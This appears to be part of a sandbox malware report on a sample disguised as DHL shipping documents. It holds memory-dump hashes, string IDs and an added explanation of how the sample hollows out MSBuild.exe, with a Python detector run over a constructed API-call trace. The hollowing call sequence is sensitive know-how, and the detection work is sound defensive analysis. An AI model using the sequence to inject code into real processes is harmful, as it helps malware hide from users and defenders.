                                                          • Instruction Fuzzy Hash: B9C1C562E1D6D24BE312BBFCB8552E57F90EF523B571841BFC1C88A097DC08684AC396
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1419677123.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff886e30000_DHL Shipping Documents 0016229753_PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3210da59079ad580778973b68ccf6c7948e53a9200be657597748fd3365640ae
                                                          • Instruction ID: da36af7a94a49461b5b41c9b4ce5a0a9e0abbe69ceb011beb4bf164cfba926c8
                                                          • Opcode Fuzzy Hash: 3210da59079ad580778973b68ccf6c7948e53a9200be657597748fd3365640ae
                                                          • Instruction Fuzzy Hash: 4231C077A289364AD7017BFDB8052E9B740DF963B6705867BD1C98E0439E08309BC7D6
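Read together, the control-flow graph entries for process 1 above spell out process hollowing: CreateProcess (the process table shows MSBuild.exe spawned from the sample), ReadProcessMemory, VirtualAllocEx and WriteProcessMemory against the child, Wow64SetThreadContext (the sample is 64-bit and the target MSBuild.exe runs as a Wow64 process, hence the Wow64 variant), then ResumeThread. The following added example, which is not code from the report or from the sample, implements that sequence as a detection over an API-call trace. The trace format (one record per call, with the caller pid and a target_pid already resolved from the process handle) and the pids are constructed for illustration; a real monitor usually yields only the HANDLE and the resolution has to be done by the tracer.

```python
from dataclasses import dataclass, field
from typing import Iterable

CREATE_SUSPENDED = 0x00000004  # dwCreationFlags bit passed to CreateProcess


@dataclass(frozen=True)
class ApiCall:
    """One monitored API call. Assumption: the monitor has resolved process
    handles to pids (target_pid); real traces usually expose only the HANDLE."""
    seq: int
    pid: int          # calling process
    api: str
    args: dict


@dataclass
class Hollowing:
    parent_pid: int
    child_pid: int
    image: str
    stages: list[str] = field(default_factory=list)


# Constructed trace, modelled on the API names in the CFG entries above.
# pid 1000 plays the sample, pid 3000 the suspended MSBuild.exe. The second
# parent (2000/4000) creates a suspended child and resumes it without ever
# writing into it, the pattern a debugger or job-control launcher produces,
# and must not fire.
SAMPLE_TRACE = [
    ApiCall(1, 1000, "CreateProcessW", {"image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
                                        "flags": CREATE_SUSPENDED, "new_pid": 3000}),
    ApiCall(2, 1000, "ReadProcessMemory", {"target_pid": 3000}),                 # read the child's PEB
    ApiCall(3, 1000, "VirtualAllocEx", {"target_pid": 3000, "protect": 0x40}),   # PAGE_EXECUTE_READWRITE
    ApiCall(4, 1000, "WriteProcessMemory", {"target_pid": 3000}),                # PE headers
    ApiCall(5, 1000, "WriteProcessMemory", {"target_pid": 3000}),                # sections
    ApiCall(6, 1000, "Wow64SetThreadContext", {"target_pid": 3000}),             # new entry point in the thread context
    ApiCall(7, 1000, "ResumeThread", {"target_pid": 3000}),
    ApiCall(8, 2000, "CreateProcessW", {"image": r"C:\tools\child.exe", "flags": CREATE_SUSPENDED, "new_pid": 4000}),
    ApiCall(9, 2000, "ResumeThread", {"target_pid": 4000}),
]

WRITE_APIS = {"VirtualAllocEx", "WriteProcessMemory"}
CONTEXT_APIS = {"SetThreadContext", "Wow64SetThreadContext"}


def detect_hollowing(trace: Iterable[ApiCall]) -> list[Hollowing]:
    """Flag a parent that creates a suspended child, writes into it, replaces
    the primary thread's context and then resumes it.

    State is kept per suspended child and discarded on ResumeThread, so
    CreateProcess(CREATE_SUSPENDED) followed directly by ResumeThread, or a
    write without a context change, produces no finding.
    """
    pending: dict[int, Hollowing] = {}   # child pid -> partial finding
    wrote: set[int] = set()
    ctx_set: set[int] = set()
    findings: list[Hollowing] = []
    for call in sorted(trace, key=lambda c: c.seq):
        if call.api in ("CreateProcessW", "CreateProcessA", "CreateProcessInternalW"):
            if call.args.get("flags", 0) & CREATE_SUSPENDED:
                child = call.args["new_pid"]
                pending[child] = Hollowing(call.pid, child, call.args.get("image", "?"), [call.api])
            continue
        child = call.args.get("target_pid")
        h = pending.get(child)
        if h is None or h.parent_pid != call.pid:
            continue                     # child not suspended, or caller is not its creator
        if call.api in WRITE_APIS or call.api == "ReadProcessMemory":
            h.stages.append(call.api)
            if call.api == "WriteProcessMemory":
                wrote.add(child)
        elif call.api in CONTEXT_APIS:
            h.stages.append(call.api)
            ctx_set.add(child)
        elif call.api == "ResumeThread":
            h.stages.append(call.api)
            if child in wrote and child in ctx_set:
                findings.append(h)
            pending.pop(child)
            wrote.discard(child)
            ctx_set.discard(child)
    return findings


if __name__ == "__main__":
    for f in detect_hollowing(SAMPLE_TRACE):
        print(f"pid {f.parent_pid} hollowed pid {f.child_pid} ({f.image}): {' -> '.join(f.stages)}")
```

Requiring both a write and a context change before the resume keeps the rule from firing on legitimate launchers that create suspended children (debuggers, some installers), while still matching the variant that uses SetThreadContext on a native 64-bit target instead of the Wow64 call seen in this report.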

                                                          Execution Graph

                                                          Execution Coverage:11.4%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:17
                                                          Total number of Limit Nodes:4
                                                          execution_graph: node/edge dump omitted (graph rendering residue); entry node at 1350848, reaching 1351342, 1357059, 60cceb0/60ccec0 and the GlobalMemoryStatusEx call node at 60cd50a.

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph: basic-block dump omitted (graph rendering residue); function 1353e48-1354148, calls 1350ab8.
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: \Vam$dyqJ$dyqJ
                                                          • API String ID: 0-913269209
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph: basic-block dump omitted (graph rendering residue); function 1354a60-1354dae, calls 1350ab8.
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: dyqJ$dyqJ
                                                          • API String ID: 0-3410880094
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph: basic-block dump omitted (graph rendering residue); function 1353e3c-1354148, calls 1350ab8.
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: \Vam$dyqJ$dyqJ
                                                          • API String ID: 0-913269209

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph: basic-block dump omitted (graph rendering residue); function 60ce0c8-60ce255, calls 60cd4ac, 60cd4b8 and GlobalMemoryStatusEx.
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2594848220.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_60c0000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: dyqJ
                                                          • API String ID: 0-1846348974

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph: basic-block dump omitted (graph rendering residue); function 60ce1b0-60ce255, calls GlobalMemoryStatusEx.
                                                          APIs
                                                          • GlobalMemoryStatusEx.KERNELBASE ref: 060CE217
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2594848220.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_60c0000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID: GlobalMemoryStatus
                                                          • String ID: dyqJ
                                                          • API String ID: 1890195054-1846348974

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph: basic-block dump omitted (graph rendering residue); function 1354a56-1354dae, calls 1350ab8.
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: dyqJ$dyqJ
                                                          • API String ID: 0-3410880094

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph: basic-block dump omitted (graph rendering residue); function 1356ca5-1356e68, calls 1350a00.
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: dyqJ$dyqJ
                                                          • API String ID: 0-3410880094

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph: basic-block dump omitted (graph rendering residue); function 1356cb0-1356e68, calls 1350a00.
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: dyqJ$dyqJ
                                                          • API String ID: 0-3410880094

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph: basic-block dump omitted (graph rendering residue); function 13526b0-13527e9, no calls.
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: dyqJ
                                                          • API String ID: 0-1846348974

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph: basic-block dump omitted (graph rendering residue); function 13526a4-13527e9, no calls.
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: dyqJ
                                                          • API String ID: 0-1846348974
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 50118dee179a57def944a65e30bcf5fa4edee3f5edd04b6bd4430d6456eb57cd
                                                          • Instruction ID: 3c882a73f241d8fb6c0f2402e09d3ad5ab60e9288199dd2e57964fd13720eaf7
                                                          • Opcode Fuzzy Hash: 50118dee179a57def944a65e30bcf5fa4edee3f5edd04b6bd4430d6456eb57cd
                                                          • Instruction Fuzzy Hash: 70E18E35A00204CFDB55DFA8D594BADBBB2EF89718F248469E806EB391DB35DC41CB90
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5cf7098defa6af66fc2674fb0d155725c10c5a7c95f905f56130b94d0a769f0d
                                                          • Instruction ID: a2b7deac7f42a750d8f1ec2a4d00a7633a7457fbbb623831bc3e3c3510c29451
                                                          • Opcode Fuzzy Hash: 5cf7098defa6af66fc2674fb0d155725c10c5a7c95f905f56130b94d0a769f0d
                                                          • Instruction Fuzzy Hash: FBD1BF71A00205CFDB55CFA8D884BAEBBB2FF88718F14856AE909DB391D771D841CB91
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 74ad50434544cbc6183f32e41dfb8c26b7bc1f4427a893b9cbb37acfe2762b55
                                                          • Instruction ID: 15e4f4a9756c2ac92ed192699c75df80a3875f3d67294b0860ec4139b0bb71f8
                                                          • Opcode Fuzzy Hash: 74ad50434544cbc6183f32e41dfb8c26b7bc1f4427a893b9cbb37acfe2762b55
                                                          • Instruction Fuzzy Hash: E551C570F102198FDB65DBB9C414BAEBBB6FF85B04F50852AE805EB381DB719846CB50
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d5674ecf418898f1ef8e4125e5dee5195da71b5416e6e2182500c523ea8246c1
                                                          • Instruction ID: d41222380b096e5c7fcbfba3db8b40288809516958a90ea609da9711380c0fb8
                                                          • Opcode Fuzzy Hash: d5674ecf418898f1ef8e4125e5dee5195da71b5416e6e2182500c523ea8246c1
                                                          • Instruction Fuzzy Hash: 28516E712063C1CFC706FB28F881B593B7ABB8630470489A9D040CF66EDAB56D09CF85
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 30c4f12b19f9f31e71612345d4218207fd0d94d9370a57ea0090c1cad1e24e04
                                                          • Instruction ID: b67966bd454102e9c8160f3ee76c7f33eb856cc12181828d20368a4c6ecb4374
                                                          • Opcode Fuzzy Hash: 30c4f12b19f9f31e71612345d4218207fd0d94d9370a57ea0090c1cad1e24e04
                                                          • Instruction Fuzzy Hash: D7312530B00205CFDB16AF38D11876E3BF6AF88648B144968D406EB345EF35CC06CB90
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bc8f03053d5328f8edab0dfc7e0309d915efe143ec43fe2f6336470917ca64e5
                                                          • Instruction ID: b5ed30ea63b347b002a9951712c30842309fbd74cadb569d056882e3e3dba5e0
                                                          • Opcode Fuzzy Hash: bc8f03053d5328f8edab0dfc7e0309d915efe143ec43fe2f6336470917ca64e5
                                                          • Instruction Fuzzy Hash: 1741D770206285CFD716FB28F882B693B6EB7953043049AA9D051CF66EDAB16D05CF85
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 56f4655a5a6dda1a31b4d766c44394e7b18cdf69d829fb51527cffc781387b29
                                                          • Instruction ID: f1bd0b0a1f7f1a83b9368a7ca794132e96387167f6e8a8f798f71f40ca907621
                                                          • Opcode Fuzzy Hash: 56f4655a5a6dda1a31b4d766c44394e7b18cdf69d829fb51527cffc781387b29
                                                          • Instruction Fuzzy Hash: AC319270E10209CBEB65CFA9C851B9EBBBAFF85704F908526E805EB340E771D845CB40
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 874809311ded30664eeaa2bb5e4e159de11e23aa90a49bae8dc0519ba0ba61dd
                                                          • Instruction ID: 882bd0b8807249c3168738821cfc35ab251c834fe00c5ae36f7205da7889d585
                                                          • Opcode Fuzzy Hash: 874809311ded30664eeaa2bb5e4e159de11e23aa90a49bae8dc0519ba0ba61dd
                                                          • Instruction Fuzzy Hash: D131BE35E102098BDB19CF69D494A9EBBB6FF88704F108529E806FB351DF70AC42CB50
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7626961a9ac75518550a119ebdeaf797ddf463470ce736bba5296814c02f271a
                                                          • Instruction ID: f1b4d96c037d7a3202d0f0309106ec7f2238def508b30bd42afcdfe15f3a66e1
                                                          • Opcode Fuzzy Hash: 7626961a9ac75518550a119ebdeaf797ddf463470ce736bba5296814c02f271a
                                                          • Instruction Fuzzy Hash: 143107782012444BEF62FB3CE888F6A3759EB8571CF044965D815CF35AEB35EC458BA2
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 38dad71ad9cc44029ab202c914e42ea5d9437b10d0338a7d06b2e6d2403ab9ab
                                                          • Instruction ID: 6075fe5a9a3d037aa612928665fe42173280160e25e4a13b9614c5a3bf51a2d9
                                                          • Opcode Fuzzy Hash: 38dad71ad9cc44029ab202c914e42ea5d9437b10d0338a7d06b2e6d2403ab9ab
                                                          • Instruction Fuzzy Hash: 16317C74E102099BDB19DF69D594AAEBBB6BF88704F108529E806FB351DF70AC42CB50
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fe1b7c8d4c3b919e302dd495c79788f7430150734861705a52172791b062b099
                                                          • Instruction ID: f4167d3afb7f6625cc53b8240d471173a53a2116e014d8c3b31099ab1e39dac7
                                                          • Opcode Fuzzy Hash: fe1b7c8d4c3b919e302dd495c79788f7430150734861705a52172791b062b099
                                                          • Instruction Fuzzy Hash: 40319531E10209DBDB15CF69D450B9EFBB2FF89708F548629E805EB392EB719841CB90
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2ac978df1c3aa06e8fbd2a7ee86efe159e5b1304129ae46e71e844cc9ce999ca
                                                          • Instruction ID: 9f4bea663710fed79f47a8feff1a69d1ea2d2c184bd636c4aa44d5d1e7176738
                                                          • Opcode Fuzzy Hash: 2ac978df1c3aa06e8fbd2a7ee86efe159e5b1304129ae46e71e844cc9ce999ca
                                                          • Instruction Fuzzy Hash: 24210834700214CFDB09EBB4D498B6E77BBFB88714B208468D4069B3A9CF769C42DB90
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0816bca9ee9631295ffa8b512ea969556e13abb376936bc5c0a88e46f646daf4
                                                          • Instruction ID: 6cba4be4d0ac2eef1181cbaa76f6c8b2a4cca9fe70671352a40fc95b53f3206f
                                                          • Opcode Fuzzy Hash: 0816bca9ee9631295ffa8b512ea969556e13abb376936bc5c0a88e46f646daf4
                                                          • Instruction Fuzzy Hash: 33219430E10209DBDB15CF69D450B9EFBB2FF89708F148629E805EB392EB709841CB90
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: deb5f8ec8c7fc4f0375a4272de3930b7b888ea3d43a86536519f9765ecce3380
                                                          • Instruction ID: ab6deb727152f289c0efb96f379e813e263d2c6f7710177d04c4886578fc0f3a
                                                          • Opcode Fuzzy Hash: deb5f8ec8c7fc4f0375a4272de3930b7b888ea3d43a86536519f9765ecce3380
                                                          • Instruction Fuzzy Hash: 8021A435E00209DBCB19CFA8C450A9EF7B2AF89748F50861AEC15F7341DBB19945CB50
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6c67eaa5c743e701bb9dfb19f937355f4acd74d3ccf123f516363c830b203fe7
                                                          • Instruction ID: 3ade6065cdb4711f1bf02f4e9c45fd6ff4bebff193d29acb980d2620dc5ab2e7
                                                          • Opcode Fuzzy Hash: 6c67eaa5c743e701bb9dfb19f937355f4acd74d3ccf123f516363c830b203fe7
                                                          • Instruction Fuzzy Hash: F8219130B00209CFDB65EB78C914BAD7BF5AF49618F1005A8D951EB290DB769C41CB91
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591757382.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_10fd000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 205f3986e7d66b0dd15ddf916751b7002a58b70d03d8d07e8cb940e245967a00
                                                          • Instruction ID: 85181016384a92e66699ee73053236ecc3f0e5c932404ccdbb8131c03ae11c10
                                                          • Opcode Fuzzy Hash: 205f3986e7d66b0dd15ddf916751b7002a58b70d03d8d07e8cb940e245967a00
                                                          • Instruction Fuzzy Hash: 0C213771504340DFDB15DF54D4C0B1ABBA5FB84314F24C5ADEA8A4B682C336D407CB62
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f7d3b9dd072a4f394153c2d223f7435303fc4f545064d80797fa8b17ccfd7a47
                                                          • Instruction ID: d65dad8b282bc439a6d7891047af3bc50d4b2cd0b058efc0fedc0141d35d398b
                                                          • Opcode Fuzzy Hash: f7d3b9dd072a4f394153c2d223f7435303fc4f545064d80797fa8b17ccfd7a47
                                                          • Instruction Fuzzy Hash: AC21D2746002418BEB72272CE4A8B6C3B21EB47719F000479E806DB386CB6A8885C742
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 42bb36823cafd9a84d3295dee2a0cd0e451d1372de3146820ccb3469890bb00b
                                                          • Instruction ID: 5cb8edba2a6e969f2dab238de0b1c3d52c4e5a953c4d1e987f4f8064ae0531bd
                                                          • Opcode Fuzzy Hash: 42bb36823cafd9a84d3295dee2a0cd0e451d1372de3146820ccb3469890bb00b
                                                          • Instruction Fuzzy Hash: 79218030E00209DBDB19CFA8C454A9EF7B2AF89748F10862AEC15BB341DBB09841CB50
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d3c6721f4c9c55900f019c690993336cead5b14f4ec35f9a0c0cc57b12f2a839
                                                          • Instruction ID: 7a808a9b68725cd8eb7f97f165073c00db456c3a877c5609d4577a8496c195f2
                                                          • Opcode Fuzzy Hash: d3c6721f4c9c55900f019c690993336cead5b14f4ec35f9a0c0cc57b12f2a839
                                                          • Instruction Fuzzy Hash: CB213D30B00209CFDBA4EB78C914BAE77F6AB4D648F200469D906EB394DB769C41CB91
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c8c0becdd3ade62fc61f38719ad549c48c3c6071ced9c770bde32503208d8135
                                                          • Instruction ID: 36106611ea687ad74da4e4cd509806956952826ccfa80e8d5ebb22514d63f398
                                                          • Opcode Fuzzy Hash: c8c0becdd3ade62fc61f38719ad549c48c3c6071ced9c770bde32503208d8135
                                                          • Instruction Fuzzy Hash: A1217C34B00105CFDB99EB38D658B9D7BF1EF4C644B1004A8E806EB3A4EB359D41CB51
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5dcc3f9fbaeb4a37707a3de79de2c9f134ee02ecbf8bb389061f42818762660e
                                                          • Instruction ID: de9c65d405dd26d5a26378ccedf1dc7192a17a20352efcfb4d3690a41f571023
                                                          • Opcode Fuzzy Hash: 5dcc3f9fbaeb4a37707a3de79de2c9f134ee02ecbf8bb389061f42818762660e
                                                          • Instruction Fuzzy Hash: 762172786012404BEF62FB2CE884B293769EB89719F104965D816CF35ADA35EC458BA1
                                                          Memory Dump Source
